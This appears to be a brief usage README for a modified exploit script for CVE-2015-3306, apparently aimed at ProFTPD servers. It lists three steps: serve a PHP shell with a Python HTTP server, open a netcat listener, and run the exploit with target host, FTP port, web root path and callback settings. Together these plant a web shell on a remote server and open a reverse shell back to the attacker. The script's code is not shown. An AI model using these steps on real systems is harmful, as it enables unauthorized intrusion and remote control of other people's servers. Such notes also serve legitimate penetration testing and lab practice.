Start server to host shell in the same directory (python3 -m http.server)
Start netcat listener on local port of choice example: (nc -nlvp [port of choice])
Run exploit example provided below (python3 modified_CVE_2015_3306.py --host [remote host] --port [most likely port 21] --path [/var/www or /var/www/html] --shell [name of php shell] --lhost [port of netcat listener] --server_port [port of server hosting shell]